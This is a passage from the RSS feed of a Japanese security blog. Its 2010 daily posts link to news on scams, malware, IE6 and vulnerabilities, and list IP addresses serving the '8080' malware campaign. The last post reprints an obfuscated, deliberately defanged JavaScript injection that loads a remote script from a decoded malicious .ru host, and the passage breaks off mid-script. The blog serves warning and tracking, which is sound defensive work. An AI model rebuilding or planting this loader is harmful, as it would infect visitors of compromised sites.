<a href="http://www.sophos.com/blogs/sophoslabs/v/post/8475"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sophos.gif" class="cIcon" alt="" />Anatomy of a free Starbucks gift card scam</a><br />
コーヒー狂な（私）人は、こーいうのに引っかかってしま・・・わないですよね（苦笑）<br />
スタバだとちょっと開きそうだなとか思ったのは内緒<br />
<br />
----------<br />
<strong>P2P共有</strong><br />
<a href="http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=%C7%AF%CB%F6%C7%AF%BB%CF%A4%CEP2P%A1%CA%A4%C4%A4%C5%A4%AD%A1%CB"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_cnotes.gif" class="cIcon" alt="" />年末年始のP2P（つづき）</a><br />
減ってるのか、減ってないのか・・<br />
喉元すぎれば・・とか言いますしね～<br />
<br />
----------<br />
<strong>ああ GreaseMonkey</strong><br />
<a href="http://jp.techcrunch.com/archives/20100201greasemonkey-chrome-firefox/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />Firefox出し抜かれる。Greasemonkeyの作者が、Chromeにネイティブサポートを追加</a><br />
TechCrunchの見出しは相変わらず上手いナァ<br />
<br />
----------<br />
<strong>Flashホール？</strong><br />
<a href="http://www.eweek.com/c/a/Security/Adobe-Flash-Security-on-Menu-at-Black-Hat-886244/"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_eweek.gif" class="cIcon" alt="" />Adobe Flash Security on Menu at Black Hat</a><br />
抽象的なので、なんとも・・<br />
「Adobeですから」、で終わってしまいそうな今日この頃・・<br />
<br />
----------<br />
<strong>もぐら叩きの果てに・・・</strong><br />
<a href="http://www.atmarkit.co.jp/fsecurity/rensai/talk13/talk01.html"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_atit.gif" class="cIcon" alt="" />第13回 「脆弱性根絶なんてできっこない」と嘆く前に</a><br />
<span class="cRefer">私は前職で、日本で初めて「セキュリティの脆弱性検査」を事業として立ち上げた経験があるのですが、始めた当初から「セキュアなプログラミングが普及すれば脆弱性検査の市場はなくなる」と考えていました。しかし、脆弱性検査はすっかり定着して、不況にもかかわらず、市場規模は縮小する気配がありません。</span><br />
いま、一番儲かるとこですしね・・（嘆息）<br />
<span class="cHide">※ムシられる側の愚痴です、ええ・・</span><br />
<br />
関連？<br />
<a href="http://slashdot.jp/yro/article.pl?sid=10/02/02/1012231&amp;threshold=-1"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_slashdotj.gif" class="cIcon" alt="" />名古屋市長が住基ネットの侵入実験を構想「今ならもっと面白い実験ができる」</a><br />
<a href="http://slashdot.jp/it/article.pl?sid=10/02/02/0953211&amp;threshold=-1"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_slashdotj.gif" class="cIcon" alt="" />「オープンソースの注意点」、オープンソースを利用する際はまず開発企業を調べろ？ </a><br />
私もわかりません・・<br />
<br />
----------<br />
<strong>ふむ～</strong><br />
<a href="http://www.benesse.co.jp/newsrelease/20100128_001.html">ベネッセが中高生に「安心・安全に携帯電話を使う」ためのサービスを提供</a><br />
<a href="http://www.benesse.co.jp/freo/">ベネッセモバイル FREO</a><br />
<br />
<span class="cRefer">自ら決めたルールの中に、本当の自由はある</span><br />
このコピーはちょっと感心しました。<br />
<br />
----------<br />
<strong>な・・なんじゃこりゃ</strong><br />
<a href="http://badwarebusters.org/main/itemview/14440"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_stop_badware.gif" class="cIcon" alt="" />URGENT! Help needed w/ Virus </a><br />
また新しいタイプですね・・・<br />
デコードする時間がなかったのでこのまま・・<br />
<br />
----------<br />
<strong>AS47560</strong><br />
trojan Gozi?<br />
<a href="http://www.malwaredomainlist.com/mdl.php?search=47560&amp;colsearch=All&amp;quantity=50"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_mdl.gif" class="cIcon" alt="" />search:47560</a><br />
<span class="cBurn">91.200.164.44</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:47560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS475601</a>(VESTEH) <img src="http://www3.atword.jp/gnome/files/2009/05/flag-ukraine.jpg" class="cFlag" alt="" /><br />
なんか IDSに引っかかってたらしいので、注意喚起です。<br />
<br />
----------<br />
<strong>8080</strong><br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">82.165.47.29</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(SCHLUND) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
*NEW(2010.02.02 23:00 +9 JST)<br />
<span class="cBurn">188.40.118.68</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24940"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24940</a>(HETZNER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">213.251.164.84</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
<br />
１個 NEW IP/ISP が発生・・・って NETZNERか・・<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265140838 | B    | [goog-black-hash 1.50178 update]<br />
| 1265140802 | M    | [goog-malware-hash 1.19084 update]<br />
|   293522 | -1271(294793) なんとなく膠着状態・・<br />
|  1302894 | <br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/03/feb-03-2010-grab-lucky-direction-roll-without-breath/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/03/feb-03-2010-grab-lucky-direction-roll-without-breath/" />
	</item>
		<item>
		<title>2010.02.02 火曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/02/feb-02-2010-tue/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/02/feb-02-2010-tue/#comments</comments>
		<pubDate>Tue, 02 Feb 2010 00:18:25 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[CNet]]></category>

		<category><![CDATA[cNotes]]></category>

		<category><![CDATA[computerworld]]></category>

		<category><![CDATA[google]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[IPA]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[Kaspersky]]></category>

		<category><![CDATA[NHS]]></category>

		<category><![CDATA[nisc]]></category>

		<category><![CDATA[nmap]]></category>

		<category><![CDATA[Oracle]]></category>

		<category><![CDATA[Panda]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[Symantec]]></category>

		<category><![CDATA[TheRegister]]></category>

		<category><![CDATA[TrendMicro]]></category>

		<category><![CDATA[VMware]]></category>

		<category><![CDATA[Websense]]></category>

		<category><![CDATA[ZDNet]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7359</guid>
		<description><![CDATA[

キャンドルマス/聖母マリアの潔めの祝日
聖母マリアが産後の汚れの潔めの式を受け，幼子イエスが律法に従いエルサレムの神殿に捧げられた日に相当する。この日でクリスマスシーズンが終わり、クリスマスツリー等を燃やす。受胎告知 [...]]]></description>
			<content:encoded><![CDATA[<p>
<div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E3%82%AD%E3%83%A3%E3%83%B3%E3%83%89%E3%83%AB%E3%83%9E%E3%82%B9"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />キャンドルマス</a>/<a href="http://ja.wikipedia.org/wiki/%E8%81%96%E6%AF%8D%E3%83%9E%E3%83%AA%E3%82%A2"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />聖母マリア</a>の潔めの祝日<br />
<div class="div10refer">聖母マリアが産後の汚れの潔めの式を受け，幼子イエスが律法に従いエルサレムの神殿に捧げられた日に相当する。この日でクリスマスシーズンが終わり、クリスマスツリー等を燃やす。受胎告知の日と混同されることがある。</div>
<a href="http://ja.wikipedia.org/wiki/%E3%82%B0%E3%83%A9%E3%82%A6%E3%83%B3%E3%83%89%E3%83%9B%E3%83%83%E3%82%B0%E3%83%87%E3%83%BC"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />グラウンドホッグデー</a><br />
<table border="1" cellpadding="10">
<tbody><tr>
<th>影（天気）</th>
<th>グラウンドホッグの行動</th>
<th>占いの結果</th>
</tr>
<tr>
<td>あり（晴）</td>
<td>影を見て驚き、冬眠していた巣穴に戻る</td>
<td>「冬はあと6週間は続くだろう」</td>
</tr>
<tr>
<td>なし（曇・悪天候）</td>
<td>影を見ず、そのまま外へ出る</td>
<td>「春は間近に迫っている」</td>
</tr>
</tbody></table>
国際航空業務再開の日<br />
<div class="div10refer">戦後禁止されていた国際航空業務が1954年に再開。1番機は日本航空の(JAL)の東京発ホノルル経由サンフランシスコ行きで、38席のうち、招待客が14人、一般の乗客は5人。</div>
バスガール（<a href="http://ja.wikipedia.org/wiki/%E3%83%90%E3%82%B9%E3%82%AC%E3%82%A4%E3%83%89"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />バスガイド</a>・<a href="http://ja.wikipedia.org/wiki/%E8%BB%8A%E6%8E%8C"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />車掌</a>を参照）の日<br />
頭痛の日<br />
<div class="div10refer">「2(ず)」「2(つう)」</div>
<br />
----------<br />
<strong>情報セキュリティの日</strong><br />
<a href="http://www.ipa.go.jp/security/event/2009/security-month.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_ipa.gif" class="cIcon" alt="" />2月は「情報セキュリティ月間」です</a><br />
<span class="cRefer">内閣官房をはじめとして、関係省庁及び政府関係機関では２月を「情報セキュリティ月間」として、情報セキュリティの向上について、関係行事の実施等集中的に行うこととしています。<br />
（「情報セキュリティ月間」の詳細については、<a href="http://www.nisc.go.jp/">内閣官房情報セキュリティセンターのホームページ</a>をご覧下さい。） </span><br />
<br />
<a href="http://www.kantei.go.jp/jp/tyokan/hatoyama/2010/0129message.html">内閣官房長官のメッセージ</a><br />
<span class="cRefer">安心・安全にインターネットを使うためには、まず最初に、次のことに気をつけて頂ければと思います。<br />
　・ウィルス対策ソフト等を導入し、定期的に更新して最新の状態に保つこと<br />
　・基本ソフト（ＯＳ）を始め各種ソフトを定期的に更新し、最新の状態に保つこと<br />
　・パスワードは、容易に推測できないものとし、他人には知らせないこと </span><br />
<br />
内閣・・・のページはPDFだらけなので割愛します。<br />
<br />
こっちのほうがイイですね。<br />
<a href="http://www.ipa.go.jp/security/posters/200910_poster.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_ipa.gif" class="cIcon" alt="" />第5回 IPA 情報セキュリティ標語・ポスターコンクール　入選作品一覧</a><br />
こういう機会を元に、小学校あたりから教育を始めることが重要です。が・・その「テキスト」の作成、監修は非常に重要になるでしょう。<br />
<br />
RSA:<br />
<a href="http://japan.zdnet.com/news/sec/story/0,2000056194,20407777,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />情報漏洩予防で守るべき5カ条--RSAセキュリティ提唱</a><br />
<br />
----------<br />
<strong>IE6は本当に死ぬのか？</strong><br />
<a href="http://www.computerworld.jp/topics/vs/173329.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_computerworld.gif" class="cIcon" alt="" />グーグル、IE 6のサポートを打ち切りへ </a><br />
<a href="http://googleenterprise.blogspot.com/2010/01/modern-browsers-for-modern-applications.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_blogger.gif" class="cIcon" alt="" />Modern browsers for modern applications</a><br />
<div class="div10"><a href="http://www.microsoft.com/windows/Internet-explorer/default.aspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoftwin.gif" class="cIcon" alt="" />Microsoft Internet Explorer 7.0+</a><br />
<a href="http://www.mozilla.com/en-US/firefox/firefox.html"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_firefox3.gif" class="cIcon" alt="" />Mozilla Firefox 3.0+</a><br />
<a href="http://www.google.com/chrome/intl/ja/landing.html?hl=ja&amp;brand=CHFV"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_chrome.gif" class="cIcon" alt="" />Google Chrome 4.0+</a><br />
<a href="http://www.apple.com/safari/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_apple.gif" class="cIcon" alt="" />Safari 3.0+</a> </div>
あれ？・・？　なにか無い気もするけど・・まいっか（笑）<br />
<br />
一方で、英国政府は IE6を排除しないと発表<br />
<a href="http://www.theregister.co.uk/2010/02/01/ie6_microsoft_uk_government/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />UK.gov unmoved by Internet Explorer 6 security concerns</a><br />
暗に、フランス・ドイツを牽制してるのか？　大人の事情なのでしょうね。<br />
でも、政府機関の一部は・・<br />
<a href="http://www.theregister.co.uk/2010/02/01/doh_ie6/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />DoH tells NHS to dump IE6</a><br />
<span class="cRefer">In a technology bulletin published by the department's informatics directorate on 29 January 2010, it advised NHS trusts using Microsoft Internet Explorer 6 on either Windows 2000 or Windows XP to move to version 7 of the browser.</span><br />
<a href="http://ja.wikipedia.org/wiki/NHS"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />NHS</a> : 英国営医療サービス事業<br />
※Windows2000って <a href="http://ja.wikipedia.org/wiki/Internet_Explorer#Internet_Explorer_7"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />IE7</a>対応してましたっけ？<br />
<br />
一方、Cnetではこんな論調<br />
<a href="http://news.cnet.com/8301-30685_3-20000032-264.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />Petition urges U.K. government to dump IE 6</a><br />
<span class="cRefer">It's time for the United Kingdom government to scrap Internet Explorer 6, upgrading away from the browser introduced in 2001 and the problems it brings now, according to a petition submitted Monday. </span><br />
<a href="http://petitions.number10.gov.uk/ie6upgrade/">Petition to: encourage government departments to upgrade away from Internet Explorer 6.</a>という、電子嘆願書の受付も行われているので、内部で意見が分かれているのでしょう。<br />
<br />
いずれにせよ、IE6はもう枯れたプラットホームというのが一般的な考え方ではないでしょうか？<br />
<br />
----------<br />
<strong>Mac vs Windows</strong><br />
またそのネタか！と怒られそうですが・・<br />
<a href="http://news.cnet.com/8301-27080_3-10444561-245.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />In their words: Experts weigh in on Mac vs. PC security</a><br />
長文すぎるので、適当にナナメ読み・・<br />
コメントがすごい<br />
<br />
----------<br />
<strong>その他</strong><br />
<br />
時間切れ：<br />
<span class="cCom">UKの記事をじーっと眺めていたら半分寝てました（苦笑）</span><br />
<br />
<a href="http://www.symantec.com/connect/blogs/now-you-see-me-now-you-don-t"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_symantec.gif" class="cIcon" alt="" />Now You See Me, Now You Don’t</a><br />
<a><img src="http://www3.atword.jp/gnome/files/2009/02/ico_symantec.gif" class="cIcon" alt="" />Backdoor.Tidserv.K</a><br />
どっかでみた ランダム数字+.cn のヤツですね<br />
最近、<a href="http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=CNNIC%A4%CB%A4%E8%A4%EB%2Ecn%A5%C9%A5%E1%A5%A4%A5%F3%C5%D0%CF%BF%BF%B3%BA%BA%A4%CE%B8%AB%C4%BE%A4%B7"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_cnotes.gif" class="cIcon" alt="" />.cn</a>は少なくなった印象があるのですけどね。<br />
<span class="cCom">※.cnだから 中国ではなく、.plだから<s><span class="cBurn">ペルー</span></s><span class="cAttention">ポーランド</span> でもありませんけど・・・</span><br />
orz....<br />
<br />
<a href="http://pandalabs.pandasecurity.com/spam-using-twitter-and-youtube/"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_pandasecurity.gif" class="cIcon" alt="" />Spam using Twitter and Youtube</a><br />
なんでもかんでもクリックするな！と、<a href="http://www.ipa.go.jp/security/posters/200910_poster.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_ipa.gif" class="cIcon" alt="" />標語</a>でも言われてるじゃないですか（笑)<br />
<br />
<a href="http://securitylabs.websense.com/content/Alerts/3543.aspx"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_websense.gif" class="cIcon" alt="" />Malicious Google Job Application Response</a><br />
CV-20100120-112.zip.exe ですね・・・<br />
<a href="http://www.virustotal.com/analisis/d5fd8e098054a5f1b570de5d31241c1428a79fb25ec6a477261f6efaaf3d7440-1265043648"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_virustotal.gif" class="cIcon" alt="" />CV-20100120-112.zip</a> <span class="cBurn">10</span>/40 (25.00%)<br />
<br />
そういえば、KasperskyがVTを微妙に牽制してますね<br />
<a href="http://www.viruslist.com/en/weblog?weblogid=208188011"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_kaspersky-virusl.gif" class="cIcon" alt="" />On the way to better testing</a><br />
<span class="cRefer">This is why a German computer magazine conducted an experiment, and the results of this experiment were presented at a security conference last October: they created a clean file, asked us to add a false detection for it and finally uploaded it to VirusTotal. Some months later this file was detected by more than 20 scanners on VirusTotal. After the presentation, representatives from several AV vendors at the event agreed that a solution should be found. However, multi-scanner based detection is just the symptom - the root of the problem is the test methodology itself.</span><br />
クリーンなファイルをKasperskyに誤検知するように依頼した雑誌のテストで、そのファイルが VirusTotal にアップされ、その結果をみて他のベンダーも検出するようになり、いつのまにかマルウェアとして定着してしまった・・のかな？<br />
この前の、GoogleAdSenseの誤検知でも、他社に飛び火してましたしね（笑）<br />
<br />
<a href="http://japan.zdnet.com/sp/feature/09ohkawara/story/0,3800099690,20407714,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />日本オラクルが覆したい「DB性能のボトルネックはCPU」という都市伝説</a><br />
<a href="http://japan.zdnet.com/news/db/story/0,2000056180,20407569,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />日本オラクル、「クルクルキャンペーン」でRAC構成も半額以下に</a><br />
<span class="cRefer">オラクル クルクルキャンペーンでは、「オラクル、安くクル、5年クル」をキャッチフレーズに、4つのパッケージを用意する。いずれも、5年間の使用が認められる期間限定ライセンス（5 Year Term Licence）が設定される。</span><br />
ネーミングセンスに関しては、敢えて何もいいますまい・・<br />
<br />
<a href="http://www.theregister.co.uk/2010/02/01/chinese_honey_trap_attacks/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Britain warns businesses of Chinese 'honey trap'</a><br />
<a href="http://ja.wikipedia.org/wiki/%E3%82%B8%E3%82%A7%E3%83%BC%E3%83%A0%E3%82%BA%E3%83%BB%E3%83%9C%E3%83%B3%E3%83%89"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />お国柄</a>ですよね？<br />
<br />
<a href="http://blog.trendmicro.com/early-hearts-day-presents-from-spammers/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" />Early Hearts’ Day Presents from Spammers</a><br />
CONGRATULATIONS!（笑）<br />
<br />
<a href="http://www.itmedia.co.jp/enterprise/articles/1002/01/news010.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />国内でも急増するフィッシング詐欺、対策は？</a><br />
<span class="cRefer">フィッシング詐欺は海外で多発しており、多数のセキュリティベンダーが製品やサービスを提供しているほか、Internet ExplorerやFirefox、SafariなどのWebブラウザには詐欺サイトを検出する仕組みが実装されている。しかし小宮山氏が独自に調べたところ、Webブラウザの検出機能は海外の不正サイトデータでは9割以上を検知できたが、国内で入手したデータではほとんど検出できなかったという。</span><br />
<br />
<a href="http://www.h-online.com/security/news/item/Multiple-vulnerabilities-in-VMware-products-919475.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Multiple vulnerabilities in VMware products </a><br />
<a href="http://lists.vmware.com/pipermail/security-announce/2010/000078.html"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_vmware.gif" class="cIcon" alt="" />[Security-announce] VMSA-2010-0002 VMware vCenter update release addresses multiple security issues in Java JRE</a><br />
<a href="http://secunia.com/advisories/38438/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />VMware Products JRE Multiple Vulnerabilities</a> <span class="cDanger">4</span><br />
<a href="http://secunia.com/advisories/38384/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />VMware VirtualCenter JRE Multiple Vulnerabilities</a> <span class="cDanger">4</span><br />
<br />
<a href="http://isc.sans.org/diary.html?storyid=8110"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />NMAP 5.21 - Is UDP Protocol Specific Scanning Important? Why Should I Care?</a><br />
UDPパケットをより正確に解析できるようになったというお話<br />
Nmapもそろそろ使ってみないといけないけど、WireSharkで精一杯（笑）<br />
<br />
----------<br />
<strong>8080</strong><br />
*New IP*<br />
<span class="cBurn">87.106.129.220</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(SCHLUND) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
*New IP* オカエリ・・<br />
<span class="cBurn">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
<span class="cBurn">213.251.164.84</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris)<img src="http://www3.atword.jp/gnome/files/2009/07/flag-france.gif" class="cFlag" alt="" /><br />
<span class="cAttention">77.68.44.169</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:15418"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS15418</a>(FASTHOSTS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">82.165.47.29</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8560"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8560</a>(SCHLUND) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" /><br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" /><br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265054414 | B    | [goog-black-hash 1.50106 update]<br />
| 1265054403 | M    | [goog-malware-hash 1.19060 update]<br />
|   294793 | -1320(296113)<br />
|  1300563 | <br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/02/feb-02-2010-tue/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/02/feb-02-2010-tue/" />
	</item>
		<item>
		<title>[ATTENTION] 8080 変更（再々・・・）</title>
		<link>http://www3.atword.jp/gnome/2010/02/02/8080-aka-gnu-gpl-changed-thier-script/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/02/8080-aka-gnu-gpl-changed-thier-script/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 15:41:25 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[Announce]]></category>

		<category><![CDATA[RiskHedge]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[8080]]></category>

		<category><![CDATA[Unmask Parasites]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7354</guid>
		<description><![CDATA[
This must be yet another revision

またか～と頭が痛くなりますね
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。
( → （
) → ）
/ → ／

try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&#38;$-$（c$（））o&#38;）m（（.@c&#38;）!o&#38;（@n（&#38;s!）（t@!#a）n@!!t（@&#38;（@c^$^#o^#n&#38;t!a&#38;&#38;c!t（.!#（c（&#38;@^o））$^m#&#38;&#38;.@&#38;p@e@）^r&#38;e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&#38;m）.#（b^i）$l&#38;$（&#38;!t$o^&#38;!p^&#38;.@&#38;#&#38;r!（u$:@））N#q#@5#（^b!（&#38;@h$3）f&#38;@）i#@t&#38;$w&#38;!1@r$#v!$／!&#38;@$g####o（$@&#38;&#38;o（g$l）@!e@$.@（c$$
（）o&#38;m&#38;.$@（a^u!／^##g））（）o#^o#&#38;#g$#l!^）e$$.&#38;#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&#38;（&#38;e#^n$t^@^$s!&#38;$^.（@r#!@u）$#&#38;／（a@$l$#l!（e!^g$）（r&#38;$#）o$^&#38;.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&#38;l（e@.#!c&#38;o&#38;@m$#／^
'.replace（／#&#124;@&#124;\^&#124;\$&#124;\!&#124;&#38;&#124;\）&#124;\（／ig, ''） ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}

decode: 
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

また、散布ISPにも変動があり、
77.72.25.34 AS44062(TESENE) 
83.168.238.66 AS35041(NET-CRYSTONE) 
の２者が参戦しています。

どこまで勤勉なんでしょうね・・・
]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/comment-page-1/#comment-6699"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_unmask_parasites.gif" class="cIcon" alt="" />This must be yet another revision</a><br />
<br />
またか～と頭が痛くなりますね<br />
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。<br />
( → （<br />
) → ）<br />
/ → ／<br />
<br />
<span class="cDanger">try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&amp;$-$（c$（））o&amp;）m（（.@c&amp;）!o&amp;（@n（&amp;s!）（t@!#a）n@!!t（@&amp;（@c^$^#o^#n&amp;t!a&amp;&amp;c!t（.!#（c（&amp;@^o））$^m#&amp;&amp;.@&amp;p@e@）^r&amp;e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&amp;m）.#（b^i）$l&amp;$（&amp;!t$o^&amp;!p^&amp;.@&amp;#&amp;r!（u$:@））N#q#@5#（^b!（&amp;@h$3）f&amp;@）i#@t&amp;$w&amp;!1@r$#v!$／!&amp;@$g####o（$@&amp;&amp;o（g$l）@!e@$.@（c$$<br />
